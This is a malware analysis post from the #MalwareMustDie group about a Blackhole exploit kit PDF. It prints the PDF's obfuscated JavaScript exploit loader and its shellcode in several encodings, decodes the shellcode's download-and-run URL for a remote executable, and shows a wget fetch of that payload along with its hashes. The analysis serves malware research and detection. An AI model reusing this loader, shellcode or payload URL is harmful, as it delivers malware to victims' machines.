Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ======================================================================
- #MalwareMustDie - @unixfreaxjp ~]$ date
- Thu Jan 3 16:12:47 JST 2013
- ----------------------------------------------------------------------
- // In the "other" PDF of new obfs'edBHEK reported/tweeted at:
- // https://twitter.com/MalwareMustDie/status/286587621080182784
- // https://twitter.com/MalwareMustDie/status/286593203459747840
- //
- // PDF file data:
- // Date Time Size Name MD5
- //2013/01/03 05:22 10,053 b264b.pdf a9480ade56f5631bbc7eb4f71093a3ac
- //
- // at 0x13E5-x23AC You'll see the Java Script coded below:
- -----------------------------------------------------------------------
- <BLAH!>
- :
- <xfa:script contentType='application/x-javascript'>
- rawd='4E@83J4A1648@23J3M3M41@5463P274E@73J4A163K@03K3K1I16@33L3L3L1I@9163M3M3M@21I163N3N@53N1I163O@63O3O1I16@13P3P3P1I@116404040@3274E3J4A@616484741@8464C3N4A@14B3H3J1I@31641274E@23J4A164G@916291646@93N4F162D@74A4A3J4H@41E1F274E@93J4A164H@816291646@03N4F162D@34A4A3J4H@81E1F274E@83J4A163H@9441N2918@5203L1O1M@7221M1M3O@81M211N23@9241M203J@41P3L1O1M@7221M1M3O@11M3O221P@8241M203J@63J1P3N3K@3241M203J@51P1M1O1M@2241O203J@5223N1O3O@7241M203J@7201N201N@1201N201N@71O221M1M@81M1M1M1M@41M1M1M1M@01M1M1M1M@01M1M1M1M@61M1M1M1M@91M1M1M1M@61M1M1M1M@51N1O1P25@9241M203J@722201O1M@0221M1M3O@71M1M1M20@71M1M1M1M@9201N201N@4201N201N@7201N201N@9201N201N@5181H4A3J@34F3M1O1K@74A3N4844@73J3L3N1E@11L271L3P@51I1D1D1F@0274E3J4A@9163H441O@82918203L@71O1M221M@61M3O3J21@7221P241M@9203J1P3L@31O1M221M@81M3O2522@51O1N241M@5203J251M@01N3O241M@3203J1P1M@6251M2420@6203J233M@0233N241M@5203J201N@5201N201N@0201N1O22@51M1M1M1M@31M1M1M1M@21M1M1M1M@91M1M1M1M@21M1M1M1M@11M1M1M1M@71M1M1M1M@51M1M231N@02424241M@6203J2220@91O1M221M@61M3O1M1M@81M201M1M@81M1M201N@6201N201N@6201N201N@6201N201N@5201N181H@74A3J4F3M@11O1K4A3N@348443J3L@43N1E1L27@91L3P1I1D@31D1F273H@8441P293J@54848273H@044202946@03N4F162D@34A4A3J4H@71E1F273O@14D463L4C@841474616@23H44211E@51F4J4E3J@94A163H44@422293H44@61P1K4E41@63N4F3N4A@2383N4A4B@94147461K@44C47354C@14A41463P@51E1F273H@34422293H@944221K4A@33N48443J@13L3N1E1D@71K1D1I1D@81D1F274F@84041443N@81E3H4422@21K443N46@43P4C4028@7201F3H44@7221H291D@41M1D274A@53N4C4D4A@94616483J@54A4B3N2L@8464C1E3H@744221I1N@81M1F4L3O@64D463L4C@941474616@33H44231E@53H44241I@63H44251F@94J4F4041@4443N1E3H@844241K44@83N463P4C@0401G1O28@93H44251F@53H44241H@3293H4424@0274A3N4C@84D4A4616@43H44241K@74B4D3K4B@94C4A4146@43P1E1M1I@73H44251L@11O1F4L3O@94D463L4C@541474616@83H2L1M1E@33H2L1N1F@24J3H2L1N@0294D463N@84B3L3J48@03N1E3H2L@71N1F274A@6474C3N2G@83J43293H@82L1N1K44@93N463P4C@5401G1O27@43M3J4334@1474C3N29@14D463N4B@23L3J483N@11E1D1B4D@2251M251M@31D1F274B@7484A3J4H@7293H4423@31E3M3J43@734474C3N@21I1M4G1O@01M1M1M1J@64A474C3N@82G3J431F@82744474G@939403N3N@7293H2L1N@51H4B484A@03J4H2744@3474G3940@93N3N293H@044231E44@1474G3940@13N3N1I21@91O201M25@0241F273O@9474A1E41@7291M2716@141162816@6201M1M27@216411H1H@41F3H4420@83D413F29@644474G39@6403N3N1K@24B4D3K4B@04C4A1E1M@51I44474G@939403N3N@51K443N46@43P4C401J@31N1F1H3M@83J433447@14C3N274L@23O4D463L@84C414746@2163H2L1O@91E3H2L1N@51I443N46@21F4J4F40@241443N1E@43H2L1N1K@4443N463P@64C402844@53N461F3H@32L1N1H29@83H2L1N27@64A3N4C4D@14A46163H@12L1N1K4B@24D3K4B4C@54A41463P@61E1M1I44@23N461F4L@33O4D463L@44C414746@4163H2L1P@31E3H2L1N@11F4J4A3N@64C291D1D@1273O474A@51E41291M@92741283H@92L1N1K44@83N463P4C@34027411H@7291O1F4J@13K293H2L@31N1K4B4D@43K4B4C4A@51E411I1O@71F273L29@8483J4A4B@03N2L464C@51E3K1I1N@3221F274A@33N4C1H29@5354C4A41@1463P1K3O@64A47452F@7403J4A2F@3473M3N1E@13L1F274L@54A3N4C4D@84A46164A@53N4C4L3O@94D463L4C@441474616@03H42411N@21E3H2L1N@01I3H2L20@11F4J3H2L@721291D1D@2273O474A@21E3H2L22@8291M273H@52L22283H@12L1N1K44@93N463P4C@040273H2L@5221H1H1F@44J3H4425@0293H2L20@51K443N46@43P4C4027@53H2L2329@03H2L1N1K@03L403J4A@32F473M3N@12D4C1E3H@62L221F27@03H2L2429@53H2L201K@83L403J4A@72F473M3N@32D4C1E3H@52L221B3H@644251F27@73H2L211H@729354C4A@041463P1K@03O4A4745@12F403J4A@72F473M3N@21E3H2L23@33G3H2L24@51F274L4A@93N4C4D4A@746163H2L@6214L3O4D@0463L4C41@44746163H@32L251E3H@02L221F4J@03H421M29@93H2L221K@74C47354C@04A41463P@91E1N221F@2273H421N@2293H421M@61K443N46@43P4C4027@93H2L2129@61E3H421N@11B1O1F2B@41D1M1D1H@33H421M26@93H421M27@34A3N4C4D@04A46163H@92L214L3O@34D463L4C@141474616@73H421O1E@73H2L1N1F@74J3H2L21@4291D1D27@73O474A1E@43H2L2229@11M273H2L@922283H2L@81N1K443N@4463P4C40@1273H2L22@01H291O1F@34J3H2L21@01H291D1B@14D1D273H@52L211H29@33H2L251E@53H2L1N1K@33L403J4A@72F473M3N@42D4C1E3H@92L221H1N@91F1F273H@02L211H29@23H2L251E@83H2L1N1K@33L403J4A@42F473M3N@82D4C1E3H@72L221F1F@64L4A3N4C@74D4A4616@63H2L214L@33O4D463L@14C414746@3163H421P@91E1F4J3H@44220293H@444211E1F@727413O1E@03H422028@5251M1M1M@81F4J3H42@621291D47@61H4D2D35@1423P3P3P@143484D2O@9202E2N1L@61L1L1L1L@44F2D2D2D@82D2E2D2D@22D2D2D2D@52D2D2D2D@72D2D332D@22D2D2D2D@92D2D2D3O@8403J2D35@5412D3P3B@32D25242H@62L2E2N1D@4273H4222@9293H441N@5273H4223@1293H2L1P@41E3H4222@61F4L3N44@64B3N4J3H@34221291D@3432E1H2D@135424133@3402H4825@33O472E2N@61L1L1L1L@31L4F2D2D@12D2D2E2D@42D2D2D2D@42D2D2D2D@42D2D2D33@32D2D2D2D@02D2D2D2D@83B4G2F2D@235412D3P@43B2D1L3O@32H202E2N@11D273H42@622293H44@41O273H42@923293H2L@11P1E3H42@8221F4L3H@74224291D@835374349@72D2G3P3P@22D2D2E2E@91D273H42@425293H2L@11O1E1D33@7372I2E1D@71I1N1M25@424201F27@83H44441M@0291D3333@93L2D2D2D@72H2G2D2D@32H2D2D2D@12D4F2L2D@12D2D2D33@92H2G2D2D@52H2D2D2D@72D2E2D2D@12D2D2D4F@62H2G2D2D@12H2D2D2D@52D2E2D2D@12D2D2E3P@42H2G2D2D@12H2D2D2D@62D2E2D2D@42D2D2H33@52H2H2D2D@42H2D2D2D@12D2L2D2D@32D2D2I4F@32H2H2D2D@62H2D2D2D@42D4F2L2D@92D2D372D@72H2G2D2P@14F2D2D2D@72F352L2D@12D2D2D2D@22D2D2D2D@92D2P2G2D@2421L1L1L@91L1L1D27@53H44441N@5293H4224@01H3H4225@41H3H4444@31M1H3H42@921273H44@6441O293H@142411N1E@03H42231I@31D1D1F27@2413O1E3H@544441O1K@7443N463P@04C401B1O@11F3H4444@21O1H294D@6463N4B3L@43J483N1E@71D1B1M1M@21D1F273H@044441P29@13H421O1E@13H44441O@71F274F41@44C401E4J@043263H44@0441P4L1F@63H2L1M1E@0431F272L@5453J3P3N@52I413N44@53M1N1K4A@03J4F383J@8444D3N29@13H44441N@54L3H421P@91E1F27';
- rawd2='6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f39332e3139302e34342e3137372f636c6f736573742f3938796638393133666a6970676a69616c6867383233396a676967686e6a683469366b356f2e7068703f696e686f713d33303a316e3a31693a31693a333326796f6f726d7576653d316b3a31663a32773a316d3a33313a316f3a316c3a316c3a33303a3331267563623d3169266671747a65683d6c6f666670267077656a663d6369727063640000';
- tt="t"+"a"+"rg";
- with(event){
- ev=/*123123*/"ev"/*/renyaerz*/;
- ev+="a";
- l="l";
- t=target;
- ev+=l;
- cr='ti';
- cr2='au';
- cr2+='th';
- cr3='sp';
- cr3+='l';
- cr4='rep';
- cr4+='l';
- if(event.name==='Ini'+'t'){
- cr+=/*%#!%#!*/'t';
- k=t[ev];
- cr+='le';
- cr2+='or';
- cr3+='it';
- a=rawd;}
- }
- s="";
- z=a;
- str="Str";
- str+="i";
- str+="ng";
- ss=(k)?k(str):12;
- cr4+='ace';
- ff="f1r2o3m4C5h6a7r8C9o0d1e"[cr4](/[0-9]+/g,'');
- pp="par";
- ss=ss[(k)?ff:0];
- pp+=ss(115,101,73,110,116);
- q=t[pp];
- xz=a.length;
- for(i=0;xz>i;i=2+i){
- i2=i+1;
- if (z[i]!='@')
- if(event.name==='Ini'+'t')s+=(ss(q(z[i]+z[i2],26)));
- }
- z=xvasvs=s;
- k(z);
- </xfa:script>
- :
- // It is using malicious JS/Command im scattered strings,
- // The usage of the /* comment */ to confuse the deobfuscator
- // The usage of the event & target to manipulate the eval's output
- // My tip is: be smart!
- // At the top you saw the rawd strings which is the obfs'ed exploit code,
- // and following by the rawd2, which at the glance I know it as a shellcode-
- // format, well, in my case I just hit the shellcode :-)
- // for obfuscating the exploit code you need to make it simple with following tip:
- // 1. make the code simple, merge the scattered command, join the /*comment*/
- // 2. re-code all variable related to the event & target
- // 3. In the end just document.write(z); or eval(z); <-- key of the deobfs.
- // see the rawd2 well, see the combination strings of
- // "68 74 74 70 3A 2F 2F 39" and "00 00" in the end suggesting me
- // a hidden url is in there...
- 6683E4FCFC85E47534E95F33C0648B40308B400C8B701C568B760833DB668B5E3C0374332C81EE1510FFFF
- B88B4030C346390675FB87342485E47551E9EB4C51568B753C8B74357803F5568B762003F533C94941FCAD
- 03C533DB0FBE1038F27408C1CB0D03DA40EBF13B1F75E65E8B5E2403DD668B0C4B8D46ECFF54240C8BD803
- DD8B048B03C5AB5E59C3EB53AD8B6820807D0C33740396EBF38B68088BF76A0559E898FFFFFFE2F9E80000
- 000058506A4068FF0000005083C01950558BEC8B5E1083C305FFE3686F6E00006875726C6D54FF1683C408
- 8BE8E861FFFFFFEB02EB7281EC040100008D5C240CC7042472656773C744240476723332C7442408202D73
- 205368F8000000FF560C8BE833C951C7441D0077706274C7441D052E646C6CC6441D0900598AC104308844
- 1D0441516A006A0053576A00FF561485C075166A0053FF56046A0083EB0C53FF560483C30CEB02EB134780
- 3F0075FA47803F0075C46A006AFEFF5608E89CFEFFFF8E4E0EEC98FE8A0E896F01BD33CA8A5B1BC6467936
- 1A2F70687474703A2F2F39332E3139302E34342E3137372F636C6F736573742F3938796638393133666A69
- 70676A69616C6867383233396A676967686E6A683469366B356F2E7068703F696E686F713D33303A316E3A
- 31693A31693A333326796F6F726D7576653D316B3A31663A32773A316D3A33313A316F3A316C3A316C3A33
- 303A3331267563623D3169266671747A65683D6C6F666670267077656A663D6369727063640000
- // save the strings into the binary and save it as text
- // in hex..,
- 66 83 E4 FC FC 85 E4 75 34 E9 5F 33 C0 64 8B 40 30 8B 40 0C 8B 70 1C 56 8B 76 08 33 DB
- 66 8B 5E 3C 03 74 33 2C 81 EE 15 10 FF FF B8 8B 40 30 C3 46 39 06 75 FB 87 34 24 85 E4
- 75 51 E9 EB 4C 51 56 8B 75 3C 8B 74 35 78 03 F5 56 8B 76 20 03 F5 33 C9 49 41 FC AD 03
- C5 33 DB 0F BE 10 38 F2 74 08 C1 CB 0D 03 DA 40 EB F1 3B 1F 75 E6 5E 8B 5E 24 03 DD 66
- 8B 0C 4B 8D 46 EC FF 54 24 0C 8B D8 03 DD 8B 04 8B 03 C5 AB 5E 59 C3 EB 53 AD 8B 68 20
- 80 7D 0C 33 74 03 96 EB F3 8B 68 08 8B F7 6A 05 59 E8 98 FF FF FF E2 F9 E8 00 00 00 00
- 58 50 6A 40 68 FF 00 00 00 50 83 C0 19 50 55 8B EC 8B 5E 10 83 C3 05 FF E3 68 6F 6E 00
- 00 68 75 72 6C 6D 54 FF 16 83 C4 08 8B E8 E8 61 FF FF FF EB 02 EB 72 81 EC 04 01 00 00
- 8D 5C 24 0C C7 04 24 72 65 67 73 C7 44 24 04 76 72 33 32 C7 44 24 08 20 2D 73 20 53 68
- F8 00 00 00 FF 56 0C 8B E8 33 C9 51 C7 44 1D 00 77 70 62 74 C7 44 1D 05 2E 64 6C 6C C6
- 44 1D 09 00 59 8A C1 04 30 88 44 1D 04 41 51 6A 00 6A 00 53 57 6A 00 FF 56 14 85 C0 75
- 16 6A 00 53 FF 56 04 6A 00 83 EB 0C 53 FF 56 04 83 C3 0C EB 02 EB 13 47 80 3F 00 75 FA
- 47 80 3F 00 75 C4 6A 00 6A FE FF 56 08 E8 9C FE FF FF 8E 4E 0E EC 98 FE 8A 0E 89 6F 01
- BD 33 CA 8A 5B 1B C6 46 79 36 1A 2F 70 68 74 74 70 3A 2F 2F 39 33 2E 31 39 30 2E 34 34
- 2E 31 37 37 2F 63 6C 6F 73 65 73 74 2F 39 38 79 66 38 39 31 33 66 6A 69 70 67 6A 69 61
- 6C 68 67 38 32 33 39 6A 67 69 67 68 6E 6A 68 34 69 36 6B 35 6F 2E 70 68 70 3F 69 6E 68
- 6F 71 3D 33 30 3A 31 6E 3A 31 69 3A 31 69 3A 33 33 26 79 6F 6F 72 6D 75 76 65 3D 31 6B
- 3A 31 66 3A 32 77 3A 31 6D 3A 33 31 3A 31 6F 3A 31 6C 3A 31 6C 3A 33 30 3A 33 31 26 75
- 63 62 3D 31 69 26 66 71 74 7A 65 68 3D 6C 6F 66 66 70 26 70 77 65 6A 66 3D 63 69 72 70
- 63 64 00 00
- // in ASCII...
- fƒäüü…äu4é_3Àd‹@0‹@.‹p.V‹v.3Ûf‹^<.t3,.î..ÿÿ¸‹@0ÃF9.uû‡4$…äuQéëLQV‹u<‹t5x.õV‹v .õ3ÉIAü
- .Å3Û.¾.8òt.ÁË..Ú@ëñ;.uæ^‹^$.Ýf‹.K.FìÿT$.‹Ø.Ý‹.‹.Å«^YÃëS‹h €}.3t.–ëó‹h.‹÷j.Yè˜ÿÿÿâùè....
- XPj@hÿ...PƒÀ.PU‹ì‹^.ƒÃ.ÿãhon..hurlmTÿ.ƒÄ.‹èèaÿÿÿë.ër.ì.....\$.Ç.$regsÇD$.vr32ÇD$. -s Shø...ÿV.‹è
- 3ÉQÇD..wpbtÇD...dllÆD...YŠÁ.0ˆD..AQj.j.SWj.ÿV.…Àu.j.SÿV.j.ƒë.SÿV.ƒÃ.ë.ë.G€?.uúG€?.uÄj.jþÿV
- .èœþÿÿŽN.ì˜þŠ.‰o.½3ÊŠ[.ÆFy6./phttp://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4
- i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=
- cirpcd..
- //You'll see the below url in the end of the garbled strings ;-)
- http://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd
- // fetch it:
- --15:48:34-- http://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd
- => `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@inhoq=30%3A1n%3A1i%3A1i%3A33&yoormuve=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd'
- Connecting to 93.190.44.177:80... seconds 0.00, connected.
- ---request begin---
- GET /closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd HTTP/1.0
- Referer: http://google.com/url?
- User-Agent: #MalwareMustDie is changing the lock of The Moronz's front gate...
- Accept: */*
- Host: 93.190.44.177
- Connection: Keep-Alive
- :
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Server: nginx/1.2.6
- Date: Thu, 03 Jan 2013 06:48:28 GMT
- Content-Type: application/x-msdownload
- Content-Length: 73728
- Connection: keep-alive
- X-Powered-By: PHP/5.3.10-1ubuntu3.4
- Pragma: public
- Expires: Thu, 03 Jan 2013 06:48:34 GMT
- Cache-Control: must-revalidate, post-check=0, pre-check=0
- Cache-Control: private
- Content-Disposition: attachment; filename="calc.exe"
- Content-Transfer-Encoding: binary
- :
- 200 OK
- Registered socket 1920 for persistent reuse.
- Length: 73,728 (72K) [application/x-msdownload]
- 100%[====================================>] 73,728 45.57K/s
- 15:48:37 (45.49 KB/s) - `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@inhoq=30%3A1n
- %3A1i%3A1i%3A33&yoormuve=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&ucb=1i&
- fqtzeh=loffp&pwejf=cirpcd' saved [73728/73728]
- // let's save it as calc.exe and here we are:
- Date Time Size Name MD5
- ------------------------------------------------------------------------
- 2013/01/03 15:48 73,728 calc.exe aed9ac49b10a75d54f37079b18c11153
- ------------------------------------------------------------------------
- Just as per expected, same payload:
- SHA1: e6561522623e3aff12f806bed88eb326b78af7e1
- MD5: aed9ac49b10a75d54f37079b18c11153
- File size: 72.0 KB ( 73728 bytes )
- File name: info.exe
- File type: Win32 EXE
- Tags: peexe
- Detection ratio: 8 / 45
- Analysis date: 2013-01-02 22:25:55 UTC ( 8 時間, 28 分 ago )
- url: https://www.virustotal.com/file/b9c4b1ecaa15631735cd56ac3c70a2492b2ebc052aa1b3187178765e508e2678/analysis/
- ------
- "For the sweat and tears of the tireless InfoSec Researcher who fights against malware.."
- "we dedicated our expose to restore the purity of internet!"
- Non nobis domine, non nobis, sed nomini tuo da gloriam!"
- #MalwareMustDie
Add Comment
Please, Sign In to add comment